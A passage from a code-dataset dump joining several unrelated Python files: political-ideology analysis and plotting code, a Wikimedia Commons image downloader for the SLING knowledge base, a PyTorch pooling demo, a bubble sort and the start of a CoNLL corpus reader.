np.zeros((n,m))\n i = 0\n for feature in features_name:\n matrix[:,i] = [dic[item][feature] for item in dic]\n i = i + 1\n\n # Handle nan entries\n if not with_nans:\n nonnan_values = ~(np.isnan(matrix).any(1))\n else:\n main_idx = [features_name.index(x) for x in mainfeat_list]\n nonnan_values = ~(np.isnan(matrix[:,main_idx]).any(1))\n keys = np.asarray(dic.keys())[nonnan_values]\n matrix = matrix[nonnan_values]\n\n # Return keys and matrix\n # Eventually, incumb average values and add is_nan columns\n if not with_nans:\n out_tuple = (keys,matrix)\n else:\n are_nans = np.zeros((np.shape(matrix)[0],np.shape(matrix)[1]-len(mainfeat_list)))\n are_nans_features = []\n incumb_cnt = 0\n for feature in features_name:\n if feature in mainfeat_list:\n continue\n else:\n i = features_name.index(feature)\n is_nan = np.isnan(matrix[:,i])\n matrix[is_nan,i] = np.nanmean(matrix[:,i])\n are_nans[:,incumb_cnt] = is_nan.astype(int)\n are_nans_features.append(feature+'_isnan')\n incumb_cnt = incumb_cnt + 1\n\n # Append new matrix to current matrix\n matrix = np.concatenate((matrix, are_nans), axis=1)\n final_features = features_name + are_nans_features\n out_tuple = (keys,matrix,final_features)\n\n return out_tuple\n\n#######################################################\n#################### 4 - Filter entries ###############\n#######################################################\n\n# 2) Functions\n# 2a) Convert list of string to floats\n# isdigit function for floats\ndef isdigit2(txt):\n try:\n float(txt)\n return True\n except ValueError:\n return False\n\n# Convert list to digit, and put nan/unchange others\ndef todigit(prev_list, keep_strings = False):\n new_list = prev_list\n cnt = 0\n for x in new_list:\n # Converts digitable strings to digits\n if isdigit2(x):\n new_list[cnt] = float(x)\n else:\n if x == 'NA' or not keep_strings:\n new_list[cnt] = float('nan')\n else:\n new_list[cnt] = x\n cnt = cnt+1\n return new_list\n\n# 2b) Convert incomeRaw to float\ndef income_to_float(income_list):\n float_list = income_list\n cnt = 0\n for item in income_list:\n if item == 'NA':\n float_list[cnt] = float('nan')\n else:\n income_re = re.compile('|'.join([r'\\$(\\d+)-',r'\\$(\\d+)']))\n income_re_mil = re.compile(r'\\$(\\d+)\\s') # For 1 million\n match = income_re.match(item)\n if match is None:\n match_million = income_re_mil.match(item)\n if match_million is None:\n print('Problem for matching '+item)\n exit()\n else:\n float_list[cnt] = 1000.0\n else:\n if match.group(1) is None:\n float_list[cnt] = float(match.group(2))\n else:\n float_list[cnt] = float(match.group(1))\n cnt = cnt + 1\n return float_list\n\ndef spec_to_float(field,spec_list):\n float_list = spec_list\n cnt = 0\n for item in spec_list:\n float_list[cnt] = specific_dic[field][item]\n cnt = cnt + 1\n return float_list\n\n# 2c) Filter labels (before label creation) and feature (for feature selection)\ndef filter_entries(VPL_dic,codebook,chosen_parties):\n for field in codebook:\n in_dico = codebook[field]['in_dico']\n # Filter only existing entries\n if in_dico == '1':\n field_common = codebook[field]['field_common']\n\n # A. Ordinal : convert to digits\n if codebook[field]['data_type'] == 'ordinal':\n VPL_dic[field_common] = todigit(VPL_dic[field_common])\n # B. Categorical: expand to higher dimension\n elif codebook[field]['data_type'] == 'categorical':\n categories = VPL_dic[field_common]\n categories_array = pd.get_dummies(pd.Series(categories))\n del VPL_dic[field_common] # suppress the field\n for cat_name in categories_array.keys(): # replace by categories\n VPL_dic[field_common+'__'+cat_name] = categories_array[cat_name].values.tolist()\n\n # C. Specific : use specific_dic\n elif codebook[field]['data_type'] == 'specific':\n if field_common == 'incomeRaw':\n VPL_dic[field_common] = income_to_float(VPL_dic[field_common])\n elif (field_common == 'vote_intention') or (field == 'pvote_intetion'):\n VPL_dic[field_common] = [chosen_parties.index(x)\n if x in chosen_parties else float('nan')\n for x in VPL_dic[field_common]]\n else:\n VPL_dic[field] = spec_to_float(field,VPL_dic[field])\n else:\n print('Problem with \"typeof\" of field '+field)\n\n return VPL_dic\n\n#######################################################\n################## 5 - Dependent Fields ###############\n#######################################################\n\ndef CronbachAlpha(itemscores):\n itemscores = np.asarray(itemscores)\n itemvars = itemscores.var(axis=1, ddof=1)\n tscores = itemscores.sum(axis=0)\n nitems = len(itemscores)\n\n return nitems / (nitems-1.) * (1 - itemvars.sum() / tscores.var(ddof=1))\n\ndef create_dependent_fields(user_dic,predicted_field,nquestions):\n\n if predicted_field == 'questions':\n # Initialization\n fa = FactorAnalysis()\n\n # Create matrix for factorial analysis\n fields = []\n for i in range(nquestions):\n field = 'q'+str(i+1)\n fields.append(field)\n\n (keys,X) = extract(user_dic,fields)\n\n # Center data\n mu_questions = np.tile(np.mean(X,axis = 0),(np.shape(X)[0], 1))\n std_questions = np.tile(np.std(X,axis = 0),(np.shape(X)[0],1))\n X_cen = np.divide((X - mu_questions),std_questions)\n\n # Factor Analysis on left-right dimension\n fa = FactorAnalysis(n_components=1)\n fa.fit(X_cen)\n weights = fa.components_[0]\n y = fa.transform(X_cen)[:,0]\n\n # Eigenvalues\n print('Eigenvalues : ')\n eig = np.linalg.eig(np.corrcoef(np.transpose(X_cen)))[0].tolist()\n eig = [x.real for x in eig]\n eig = sorted(eig,reverse = True)\n print(eig)\n #plt.figure()\n #plt.title(\"Eigenvalues\")\n #plt.bar(range(len(eig)), eig,\n #color=\"r\", align=\"center\")\n #plt.show()\n\n # Cronback Alpha\n X_cen[:,np.sign(weights) == -1] = -X_cen[:,np.sign(weights) == -1]\n itemscores = np.transpose(X_cen)\n print(\"Cronbach alpha = \", CronbachAlpha(itemscores))\n\n print('FA weights:')\n print(weights)\n\n # Add info in dictionary the questions aggregation\n keys_new = list(keys.tolist())\n y_new = list(y.tolist())\n add_in_dic(user_dic,keys_new,y_new,'questions')\n\n # Classify ideologies\n ncuts = 3.0\n cuts = [np.percentile(y, 100*k/ncuts) for k in range(int(ncuts)) if k > 0]\n idx_array = np.zeros((int(ncuts),len(y)),dtype=bool)\n for i in range(int(ncuts)):\n if i == 0:\n idx_array[i,:] = (y < cuts[i])\n elif i == ncuts-1:\n idx_array[i,:] = (y >= cuts[i-1])\n else:\n idx_array[i,:] = (y >= cuts[i-1]) & (y < cuts[i])\n for i in range(int(ncuts)):\n y[idx_array[i,:]] = i\n add_in_dic(user_dic,keys.tolist(),y.tolist(),'ideology')\n\n\n elif predicted_field == 'partyxA': # NOT YET EFFECTIVE\n # a) Initialize best parties\n best_parties = [0]*L\n best_scores = [-1]*L\n labels = [0]*L\n\n # b) Find the VPLdigit that maximize the score\n # Randomize order of parties (in case of equality maximum)\n n_prefparties = len(VPLdigit_to_party.keys())-1 # Suppress NAN\n perm = np.random.permutation(n_prefparties)\n\n # Find best party\n for i in perm:\n field = 'party'+str(i+1)+'A'\n scores = todigit(user_dic[field])\n score_cnt = 0\n for value in scores:\n if value > best_scores[score_cnt]:\n best_scores[score_cnt] = value\n best_parties[score_cnt] = i+1\n score_cnt = score_cnt + 1\n\n # c) Convert the best parties to labels\n party_cnt = 0\n for party in best_parties:\n party_name = VPLdigit_to_party[party]\n if party_name in party_dic.keys():\n labels[party_cnt] = party_dic[party_name]['ID']\n else:\n labels[party_cnt] = float('nan')\n party_cnt = party_cnt + 1\n\n elif predicted_field == 'random': # NOT YET EFFECTIVE\n L = len(user_dic['theta'])\n possible_labels = []\n for field in party_dic:\n possible_labels.append(party_dic[field]['ID'])\n labels = [rd.sample(possible_labels,1)[0] for predict in range(L)]\n else:\n print('Error in predicted field entry')\n exit()\n\n#######################################################\n##################### 6 - PLOTS #######################\n#######################################################\n\n# Choose two fields to plot (option : add a third field for color)\ndef add_plot(dic,fields,title = None, inverse_x = False, inverse_y = False,to_display = None, xlabl = None, ylabl = None, scale = True, common_fields = None,\nfilter_outliers = False, tmp_file = None):\n\n if common_fields == None:\n (keys,matrix) = extract(dic,fields)\n else:\n (keys,matrix) = extract(dic,common_fields)\n print('nsamples : '+str(len(keys)))\n\n # Filter outliers\n if filter_outliers:\n keys = np.asarray([float(key) if int(key) not in outliers\n else float('nan') for key in keys])\n nonnan_values = ~(np.isnan(keys))\n keys = keys[nonnan_values]\n matrix = matrix[nonnan_values,:]\n\n # Define colors\n if common_fields is not None:\n my_colors = matrix[:,common_fields.index('colors')]\n colors_plot = colors_for_plot(my_colors)\n elif 'colors' in fields:\n my_colors = matrix[:,fields.index('colors')]\n colors_plot = colors_for_plot(my_colors)\n else:\n colors_plot = 'black'\n\n # Define sizes\n if 'followers_count' in fields:\n followers_counts = matrix[:,fields.index('followers_count')]\n my_sizes = list(followers_counts)\n surf_min = 150\n surf_max = 800\n my_min = min(my_sizes)\n my_max = max(my_sizes)\n my_sizes = [int((my_size - my_min)*(surf_max-surf_min)/(my_max-my_min) + surf_min) for my_size in my_sizes] # mapping from one interval to another\n my_sizes = np.asarray(my_sizes)\n followers_counts = np.asarray([int(x) for x in followers_counts])\n else:\n my_sizes = np.asarray([700]*len(keys))\n followers_counts = my_sizes\n\n\n # Define plot vectors\n if common_fields == None:\n x1 = pow(-1,inverse_x)*matrix[:,0]\n x2 = pow(-1,inverse_y)*matrix[:,1]\n else:\n x1 = pow(-1,inverse_y)*matrix[:,common_fields.index(fields[0])]\n x2 = pow(-1,inverse_y)*matrix[:,common_fields.index(fields[1])]\n rho = np.corrcoef(x1,x2)\n\n if scale:\n x1 = preprocessing.scale(x1)\n x2 = preprocessing.scale(x2)\n\n print('Correlation '+str(fields[0])+'-'+str(fields[1]))\n print('Pierson: '+str(rho[0,1]))\n print('Spearman: '+str(spearmanr(x1,x2)[0])+'\\n')\n plt.grid('on')\n plt.scatter(x1,x2,alpha=0.9,s = my_sizes,facecolors=colors_plot)\n\n if to_display is not None:\n twitter_ids = [int(x) for x in to_display.keys() if x.isdigit()]\n labels_idx = [keys.tolist().index(x) for x in twitter_ids if x in keys]\n\n x1_lab = x1[labels_idx]\n x2_lab = x2[labels_idx]\n my_sizes_lab = my_sizes[labels_idx]\n followers_counts_lab = followers_counts[labels_idx]\n my_colors_lab = my_colors[labels_idx]\n new_keys = keys[labels_idx]\n # print(new_keys[0:3])\n # print(x1_lab[0:3])\n # print(x2_lab[0:3])\n labels = [to_display[str(int(x))] for x in new_keys]\n print(labels)\n for label, x, y in zip(labels, x1_lab, x2_lab):\n plt.annotate(\n label,\n xy = (x, y), xytext = (0,25),\n #xytext = (-20, 20),\n textcoords = 'offset points', ha = 'center', va = 'center',fontsize=20, # 8?\n #bbox = dict(boxstyle = 'round,pad=0.5', fc = 'none', alpha = 0.5),\n arrowprops = dict(arrowstyle = '->', connectionstyle = 'arc3,rad=0')\n )\n # Axis labels\n fs = 30\n if xlabl == None:\n plt.xlabel(fields[0]+' ideal points',fontsize = fs)\n else:\n plt.xlabel(xlabl,fontsize = fs)\n if ylabl == None :\n plt.ylabel(fields[1]+' ideal points', fontsize = fs)\n else:\n plt.ylabel(ylabl, fontsize = fs)\n\n if title is not None:\n plt.title(title)\n #plt.grid(True)\n eps = 0.4\n plt.xlim([np.min(x1)-eps, np.max(x1)+eps])\n plt.ylim([np.min(x2)-eps, np.max(x2)+2*eps])\n plt.xticks(np.linspace(-2,2,5), color='k', size=30)\n plt.yticks(np.linspace(-2,2,5), color='k', size=30)\n plt.tick_params(axis='both', which='major', pad=10)\n plt.tight_layout()\n\n if tmp_file is not None:\n if to_display is not None:\n write_names = (len(labels) == len(x1))\n else:\n write_names = False\n\n with open(tmp_file,'w') as f:\n cw = csv.writer(f)\n header = ['Twitter_ID','net','txt','colors']\n if write_names:\n header = header+['name']\n if 'followers_count' in fields:\n header = header + ['followers_count','sizes']\n cw.writerow(header)\n for i in range(len(keys)):\n if write_names:\n to_write = [int(new_keys[i]),x1_lab[i],x2_lab[i],my_colors_lab[i],labels[i]]\n if 'followers_count' in fields:\n to_write = to_write + [followers_counts_lab[i]]\n to_write = to_write + [my_sizes_lab[i]]\n else:\n to_write = [int(keys[i]),x1[i],x2[i],my_colors[i]]\n cw.writerow(to_write)\n\n\ndef plot_hist(ax, array, colors, hatches, elections, infos, std_array = None):\n\n # Parameters\n extract_baselines = False\n #space_positions = [2,5]\n space_positions = []\n if std_array is None:\n std_array = np.NAN * np.empty(np.shape(new_array))\n\n # Extract baselines\n if extract_baselines:\n b1 = 'Random'\n b2 = 'Best'\n else:\n b1 = ''\n b2 = ''\n idx1 = (np.asarray(infos) == b1) #'Random', 'Best' or ''\n idx2 = (np.asarray(infos) == b2)\n idx3 = ~(idx1 | idx2)\n baseline_1 = array[idx1,:]\n baseline_1_std = std_array[idx1,:]\n baseline_2 = array[idx2,:]\n baseline_2_std = std_array[idx2,:]\n new_array = array[idx3,:]\n new_std_array = std_array[idx3,:]\n new_colors = np.asarray(colors)[idx3]\n new_hatches = np.asarray(hatches)[idx3]\n new_infos = np.asarray(infos)[idx3]\n (M,N) = np.shape(new_array)\n\n\n ## necessary variables\n ind = np.arange(N) # the x locations for the groups\n width = 1.0/(M+2+len(space_positions)) # Considering L-white bar + two bar space\n\n ## the bars\n rects = []\n spaces = [sum(np.asarray([x]*len(space_positions))>= space_positions)\n for x in range(M)]\n for i in range(M):\n rects.append(ax.bar(ind+i*width+ spaces[i]*width, new_array[i,:], width,\n color=new_colors[i],\n hatch=new_hatches[i],\n yerr=new_std_array[i,:],\n error_kw=dict(elinewidth=2,ecolor='black')))\n\n if extract_baselines:\n for i in range(N):\n plt.plot([ind[i],ind[i]+(len(new_infos)+1)*width],[baseline_1[:,i]]*2,color = 'red',linewidth = 3)\n plt.plot([ind[i],ind[i]+(len(new_infos)+1)*width],[baseline_2[:,i]]*2,'r--',linewidth = 3)\n\n # axes and labels\n ax.set_xlim(-width,len(ind)+width)\n ax.set_ylim(0,130)\n ax.set_ylabel('Accuracy',fontsize=14)\n ax.set_title('Vote intention : prediction accuracy')\n xTickMarks = elections#['Group'+str(i) for i in range(1,N+1)]\n ax.set_xticks(ind+(M*width/2.0))\n ax.set_yticks([0,20,40,60,80,100])\n ax.yaxis.grid()\n xtickNames = ax.set_xticklabels(xTickMarks)\n plt.setp(xtickNames, rotation=0, fontsize=14)\n\n ## add a legend\n ax.legend( rects, new_infos,\n ncol = 3\n )\n\ndef plot_prec_rec(ax,prec_rec_array,party_names,colors,elections):\n x1 = prec_rec_array[0,:]\n x2 = prec_rec_array[1,:]\n for_leg = []\n colors = np.asarray(colors)\n colors_unique = pd.unique(colors)\n for color in colors_unique:\n idx = (colors == color)\n for_leg.append(plt.scatter(x1[idx],x2[idx], c = color, s = 80))\n for label, x, y in zip(party_names, x1, x2):\n plt.annotate(\n label,\n xy = (x, y), xytext = (0, 13),\n textcoords = 'offset points', ha = 'center', va = 'center',fontsize=12\n )\n ax.set_ylim(0,100)\n ax.set_xlim(0,100)\n #ax.legend(for_leg,elections,scatterpoints=1,loc='lower right',ncol=2,fontsize=14)\n ax.grid(which='major', alpha=0.5)\n ax.set_title('Vote intention : precision and recall (Network + Text)')\n ax.set_ylabel('Recall',fontsize=14)\n ax.set_xlabel('Precision',fontsize=14)\n ax.set_ylim(0,110)\n #ax.grid(which='major', alpha=0.5)\n\ndef plot_matrix(matrix, fields, title=None, cmap=plt.cm.Greens):\n fig = plt.figure()\n ax = fig.add_subplot(111)\n n = np.shape(matrix)[0]\n plt.imshow(matrix, interpolation='nearest', cmap=cmap)\n\n #### CREATE LABELS ###\n cnt = 0\n labels = []\n x1_lab = []\n x2_lab = []\n for label in np.nditer(matrix):\n labels.append(round(float(label),2))\n x1_lab.append(cnt/n)\n x2_lab.append(cnt % n)\n cnt = cnt + 1\n #####################\n\n for label, x, y in zip(labels, x1_lab, x2_lab):\n if x != y:\n ax.annotate(label,xy = (x, y), xytext = (x-0.2,y),fontsize=20)\n #plt.title(title)\n #plt.colorbar()\n tick_x = np.arange(n)\n tick_y = np.arange(n)\n plt.xticks(tick_x, fields, fontsize=17)\n plt.yticks(tick_y, fields, fontsize=17)\n ax.tick_params(axis='both', which='major', pad=8)\n #plt.tight_layout()\n #plt.ylabel('True label')\n #plt.xlabel('Predicted label')\n\n\ndef select_features(X,y,n,keys,pred_type):\n\n # Parameter\n string_limit = 6\n nusers = np.shape(X)[0]\n predictor = keys[-1]\n features = keys[0:-1]\n\n # Build a forest and compute the feature importances\n if pred_type == 'class':\n forest = ExtraTreesClassifier(n_estimators=250,\n random_state=0)\n elif pred_type == 'reg':\n forest = ExtraTreesRegressor(n_estimators=250,\n random_state=0)\n else:\n print('Problem with prediction type')\n exit()\n\n forest.fit(X, y)\n importances = forest.feature_importances_\n std = np.std([tree.feature_importances_ for tree in forest.estimators_],\n axis=0)\n indices = np.argsort(importances)[::-1]\n\n # Print the feature ranking\n print(\"Feature ranking:\")\n\n for f in range(X.shape[1]):\n print(\"%d. feature %s (%f)\" % (f + 1, features[indices[f]][0:string_limit], importances[indices[f]]))\n if (f+1) > n:\n break\n\n ticks = [features[indices[x]][0:string_limit] for x in range(n)]\n # Plot the feature importances of the forest\n plt.figure()\n plt.title(\"Feature importances for \"+predictor+\" - \"+str(nusers)+\" users\")\n plt.bar(range(X.shape[1])[0:n], importances[indices][0:n],\n color=\"r\", yerr=std[indices][0:n], align=\"center\")\n plt.xticks(range(X.shape[1])[0:n], ticks)\n plt.xlim([-1, n])\n plt.show()\n\ndef read_election(election,fields,election_file = '../data/election.csv'):\n # Initialization\n out_list = []\n flag = 0\n field_indices = []\n\n # Declare reader\n cr = csv.reader(open(election_file,'rU'),delimiter = ',')\n\n # Handle header\n header = cr.next()\n election_idx = header.index('election')\n for field in fields:\n field_indices.append(header.index(field))\n\n # Extract fields\n for line in cr:\n if line[election_idx] == election:\n flag = 1\n for field_idx in field_indices:\n out_list.append(line[field_idx])\n # Return queries\n if flag == 1:\n return out_list\n else:\n raise('Error in read_election : election not found')\n\ndef plot_kiviat(properties,values,cnt,n,offset):\n # Data to be represented\n # ----------\n # properties = ['property 1', 'property 2', 'property 3']\n # values = np.random.uniform(5,9,len(properties))\n # ----------\n\n # Use a polar axes\n axes = plt.subplot(1,n,cnt, polar=True)\n\n # Set ticks to the number of properties (in radians)\n t = np.arange(np.pi/2+offset,2*np.pi+np.pi/2+offset,2*np.pi/len(properties))\n\n plt.xticks(t, [])\n\n # Set yticks from 0 to 10\n plt.yticks(np.linspace(0,100,6),[])\n #plt.grid(linestyle=':')\n\n #plt.grid('off')\n\n\n # Draw polygon representing values\n points = [(x,y) for x,y in zip(t,values)]\n points.append(points[0])\n points = np.array(points)\n codes = [path.Path.MOVETO,] + \\\n [path.Path.LINETO,]*(len(values) -1) + \\\n [ path.Path.CLOSEPOLY ]\n _path = path.Path(points, codes)\n _patch = patches.PathPatch(_path, fill=True, color='red', linewidth=0, alpha=.1)\n axes.add_patch(_patch)\n _patch = patches.PathPatch(_path, fill=False, color='red', linewidth = 2)\n axes.add_patch(_patch)\n\n # Draw circles at value points\n plt.scatter(points[:,0],points[:,1], linewidth=2,\n s=100, color='red', edgecolor='red', zorder=10)\n\n # Set axes limits\n plt.ylim(0,100)\n\n # Properties labels\n for i in range(len(properties)):\n angle_rad = i/float(len(properties))*(2*np.pi)+np.pi/2+offset\n #angle_deg = i/float(len(properties))*360\n ha = \"right\"\n if angle_rad < np.pi/2 or angle_rad > 3*np.pi/2: ha = \"left\"\n if angle_rad == np.pi/2 or angle_rad == 3*np.pi/2: ha = \"center\"\n plt.text(angle_rad, 110, properties[i], size=16,\n horizontalalignment=ha, verticalalignment=\"center\")\n\n # Value labels\n for i in range(len(properties)):\n eps = 10\n angle_rad = i/float(len(properties))*(2*np.pi)+np.pi/2+offset\n eps_theta = np.pi/5-angle_rad/10\n\n #angle_deg = i/float(len(properties))*360\n ha = \"right\"\n if angle_rad < np.pi/2 or angle_rad > 3*np.pi/2: ha = \"left\"\n if angle_rad == np.pi/2 or angle_rad == 3*np.pi/2: ha = \"center\"\n plt.text(angle_rad+eps_theta, values[i]+eps, str(round(values[i]/100,2)), size=14,\n horizontalalignment=ha, verticalalignment=\"center\")\n","repo_name":"cvandekerckh/dynamic-lex","sub_path":"appendix.py","file_name":"appendix.py","file_ext":"py","file_size_in_byte":31481,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"32"} +{"seq_id":"11147115812","text":"import email.utils\nimport time\nimport hashlib\nimport requests\nimport sys\nimport traceback\n\nimport sling\nimport sling.media.photo\nimport sling.flags as flags\n\nflags.define(\"--kb\",\n default=\"data/e/kb/kb.sling\",\n help=\"Knowledge base with media references\")\n\nflags.define(\"--max_media_size\",\n help=\"Maximum media file size\",\n default=63*1024*1024,\n type=int,\n metavar=\"SIZE\")\n\nflags.define(\"--blacklist\",\n default=\"local/media-blacklist.txt\",\n help=\"List of blacklisted media files\")\n\nflags.define(\"--whitelist\",\n default=\"local/media-whitelist.txt\",\n help=\"List of already cached media files\")\n\nflags.define(\"--auto_blacklist\",\n help=\"add large images to blacklist\",\n default=False,\n action=\"store_true\")\n\nflags.parse()\n\nwiki_base_url = \"https://upload.wikimedia.org/wikipedia/\"\ncommons_base_url = \"https://upload.wikimedia.org/wikipedia/commons\"\ncommons_redirect = \"https://commons.wikimedia.org/wiki/Special:Redirect/file/\"\nuser_agent = \"SLING/1.0 bot (https://github.com/ringgaard/sling)\"\n\n# Session for fetching image data.\nsession = sling.media.photo.session\n\n# Read list of urls.\ndef read_urls(filename):\n list = set()\n if filename != None:\n with open(filename, \"r\") as f:\n for line in f.readlines():\n url = line.strip()\n tab = url.find('\\t')\n if tab != -1: url = url[:tab]\n list.add(url);\n return list\n\n# Compute MD5 hash for string.\ndef md5hash(s):\n md5 = hashlib.md5()\n md5.update(s.encode(\"utf8\"))\n return md5.hexdigest()\n\n# Find media files in knowledge base.\ndef get_media_files():\n # Load knowledge base.\n kb = sling.Store()\n kb.load(flags.arg.kb)\n\n n_media = kb[\"/w/media\"]\n n_role = kb[\"role\"]\n n_target = kb[\"target\"]\n p_media = kb[\"media\"]\n\n # Find all properties for WikiCommons files.\n imageprops = set()\n for name, prop in kb[\"/w/entity\"]:\n if name != n_role: continue;\n if prop[n_target] == n_media:\n imageprops.add(prop)\n\n # Find media files for all items.\n media = []\n for item in kb:\n for n, v in item:\n if n in imageprops:\n # Add Wikimedia Commons url.\n v = kb.resolve(v)\n if type(v) == str:\n fn = v.replace(' ', '_')\n md5 = md5hash(fn)\n fn = fn.replace(\"?\", \"%3F\")\n fn = fn.replace(\"+\", \"%2B\")\n fn = fn.replace(\"&\", \"%26\")\n url = \"%s/%s/%s/%s\" % (commons_base_url, md5[0], md5[0:2], fn)\n media.append(url)\n else:\n print(\"Bad media file name:\", item.id, v)\n elif n == p_media:\n # Add media url.\n v = kb.resolve(v)\n if type(v) == str:\n if v.startswith('!'): v = v[1:]\n media.append(v)\n else:\n print(\"Bad media url:\", item.id, v)\n\n return media\n\n# Get all media files.\nmedia = get_media_files()\nprint(len(media), \"media files in knowledge base\")\n\n# Read blacklist and whitelist.\nblacklist = read_urls(flags.arg.blacklist)\nwhitelist = read_urls(flags.arg.whitelist)\nprint(len(blacklist), \"blacklisted media files\")\nprint(len(whitelist), \"whitelisted media files\")\nfblack = open(flags.arg.blacklist, \"a\") if flags.arg.auto_blacklist else None\n\n# Connect to media database.\nmediadb = sling.Database(flags.arg.mediadb, \"mediaload\")\n\n# Fetch all missing media files.\nnum_urls = 0\nnum_blacklist = 0\nnum_whitelist = 0\nnum_known = 0\nnum_retrieved = 0\nnum_errors = 0\nnum_missing = 0\nnum_toobig = 0\nnum_bytes = 0\nfor url in media:\n # Discard blacklisted images.\n num_urls += 1\n if url in blacklist:\n num_blacklist += 1\n continue\n if url in whitelist:\n num_whitelist += 1\n continue\n\n # Check if url is already in media database.\n if url in mediadb:\n num_known += 1\n continue\n\n # Download image.\n try:\n r = session.get(url,\n headers={\"User-Agent\": user_agent},\n allow_redirects=False,\n timeout=60)\n if r.status_code == 404 and url.startswith(wiki_base_url):\n # Try to get image through the Special:Redirect service.\n slash = url.rfind('/')\n if slash != -1:\n redir = commons_redirect + url[slash + 1:]\n r = session.get(redir, headers={\"User-Agent\": user_agent}, timeout=60)\n if r.ok: print(\"redirect\", url, \"->\", r.url)\n if r.status_code == 301:\n redirect = r.headers['Location']\n if redirect.endswith(\"/removed.png\"):\n print(\"removed\", url)\n continue\n\n # Get redirected image.\n r = session.get(redirect,\n headers={\"User-Agent\": user_agent},\n allow_redirects=False,\n timeout=60)\n if r.status_code != 200:\n print(\"missing\", url, r.status_code)\n continue\n if not r.ok:\n num_errors += 1\n print(\"error\", r.status_code, url)\n continue\n if r.status_code == 302:\n # Imgur returns redirect to removed.png for missing images.\n num_missing += 1\n print(\"missing\", url)\n continue\n except Exception as e:\n print(\"fail\", e, url)\n num_errors += 1\n continue\n\n # Get modification timestamp.\n date = None\n if \"Last-Modified\" in r.headers:\n date = r.headers[\"Last-Modified\"]\n elif \"Date\" in r.headers:\n date = r.headers[\"Date\"]\n if date:\n ts = email.utils.parsedate_tz(date)\n last_modified = int(email.utils.mktime_tz(ts))\n else:\n last_modified = int(time.time())\n\n # Check if image is too big.\n image = r.content\n if len(image) > flags.arg.max_media_size:\n print(\"too big\", len(image), url)\n num_toobig += 1\n if fblack: fblack.write(url + \"\\n\")\n continue\n\n # Check if image is empty.\n if len(image) == 0:\n print(\"empty\", url)\n continue\n\n # Check content length.\n if \"Content-Length\" in r.headers:\n length = int(r.headers[\"Content-Length\"])\n if length != len(image):\n print(\"length mismatch\", length, \"vs\", len(image), url)\n\n # Check if image is HTML-like.\n if image.startswith(b\"\") or \\\n image.startswith(b\"\"):\n print(\"non-image\", url)\n continue\n\n # Save image in media database.\n mediadb.put(url, image, version=last_modified, mode=sling.DBNEWER)\n\n num_retrieved += 1\n num_bytes += len(image)\n print(num_retrieved, \"/\", num_urls, url)\n sys.stdout.flush()\n\nif fblack: fblack.close()\n\nprint(num_known, \"known,\",\n num_retrieved, \"retrieved,\",\n num_errors, \"errors,\",\n num_missing, \"missing\",\n num_toobig, \"too big\",\n num_blacklist, \"blacklisted\",\n num_whitelist, \"whitelisted\",\n num_bytes, \"bytes\")\n\n","repo_name":"ringgaard/sling","sub_path":"python/media/mediaload.py","file_name":"mediaload.py","file_ext":"py","file_size_in_byte":6615,"program_lang":"python","lang":"en","doc_type":"code","stars":139,"dataset":"github-code","pt":"32"} +{"seq_id":"72001078170","text":"'''\n@author:fc\n@date: 2022/1/10\n@contact:675435108@qq.com\n'''\n\"\"\"\n文件内容&功能简要:\n# torch中的池化操作\n\"\"\"\nimport warnings\nwarnings.filterwarnings(\"ignore\")\nimport torch\nfrom torch.utils.tensorboard import SummaryWriter\nimport torchvision\nfrom torch.utils.data import DataLoader\n\nclass network(torch.nn.Module):\n def __init__(self):\n super(network, self).__init__()\n self.maxPool = torch.nn.MaxPool2d(kernel_size=3,\n ceil_mode=True) # 个人:torch中,stride(移动的步长会和kernel大小一样),ceil_mode:是否填充边缘\n\n def forward(self, input):\n return self.maxPool(input)\n\nif __name__ == '__main__':\n manual_input = [\n [1, 2, 0, 3, 1],\n [0, 1, 2, 3, 1],\n [1, 2, 1, 0, 0],\n [5, 2, 3, 1, 1],\n [2, 1, 0, 1, 1]\n ]\n manual_tensor_input = torch.tensor(manual_input, dtype=torch.float32)\n manual_tensor_input = torch.reshape(manual_tensor_input,[-1,1,5,5])\n model= network()\n manual_output = model(manual_tensor_input)\n print(f\"手工样本池化后结果为{manual_output}\")\n\n cifar_test_dataset = torchvision.datasets.CIFAR10(root=\"G:/projects/PycharmProjects/Dataset/general/\",train=False,transform=torchvision.transforms.ToTensor(),download=True)\n data_loader = DataLoader(dataset=cifar_test_dataset,batch_size=64,shuffle=False,num_workers=0,drop_last=False)\n\n step = 0\n writer = SummaryWriter(\"../../log/toch.nn中池化\")\n del model\n model = network()\n for data in data_loader:\n imgs,labels = data\n step +=1\n writer.add_images(\"cifar原图\",imgs,step)\n cifar_output = model(imgs)\n writer.add_images(\"torch中的池化后\",cifar_output,step)\n writer.close()\n","repo_name":"allisokay/myDeepLearning","sub_path":"learn/pytorch/池化再识之--torch.nn.maxPool2D.py","file_name":"池化再识之--torch.nn.maxPool2D.py","file_ext":"py","file_size_in_byte":1781,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"32"} +{"seq_id":"20551202572","text":"import random\n\na = list()\nb = 0\nN = 10\n\nfor i in range(N): a.append(random.randint(1, 99))\n\nprint('Список чисел : {}'.format(a))\n\nfor i in range(N - 1):\n for j in range(N - i - 1):\n if a[j] > a[j + 1]:\n b = a[j]\n a[j] = a[j + 1]\n a[j + 1] = b\n\nprint('Отсортированный список : {}'.format(a))","repo_name":"KristaliX/Fukin-Ivan","sub_path":"Homework 4/1.py","file_name":"1.py","file_ext":"py","file_size_in_byte":365,"program_lang":"python","lang":"ru","doc_type":"code","stars":0,"dataset":"github-code","pt":"32"} +{"seq_id":"6196359200","text":"from pathlib import PurePath\nfrom typing import List, Tuple\n\nfrom nltk.corpus.reader import ConllCorpusReader\n\nfrom pii_recognition.labels.mapping import map_bio_to_io_labels\nfrom pii_recognition.tokenisation.detokenisers import Detokeniser\n\nfrom .reader import Data, Reader\n\n\ndef _sent2tokens(sent: List[Tuple[str, str, str]]) -> List[str]:\n return [token for token, postag, label in sent]\n\n\ndef _sent2labels(sent: List[Tuple[str, str, str]]) -> List[str]:\n return [label for token, postag, label in sent]\n\n\nclass ConllReader(Reader):\n def __init__(self, detokeniser: Detokeniser):\n self._detokeniser = detokeniser\n\n def _get_corpus(self, file_path: str) -> ConllCorpusReader:\n path = PurePath(file_path)\n return ConllCorpusReader(\n root=str(path.parents[0]),\n fileids=str(path.name),\n columntypes=[\"words\", \"pos\", \"ignore\", \"chunk\"],\n )\n\n def get_test_data(\n self, file_path: str, supported_entities: List[str], is_io_schema: bool = True\n ) -> Data:\n \"\"\"\n Read CONLL type of data.\n \"\"\"\n data = self._get_corpus(file_path)\n\n sent_features = 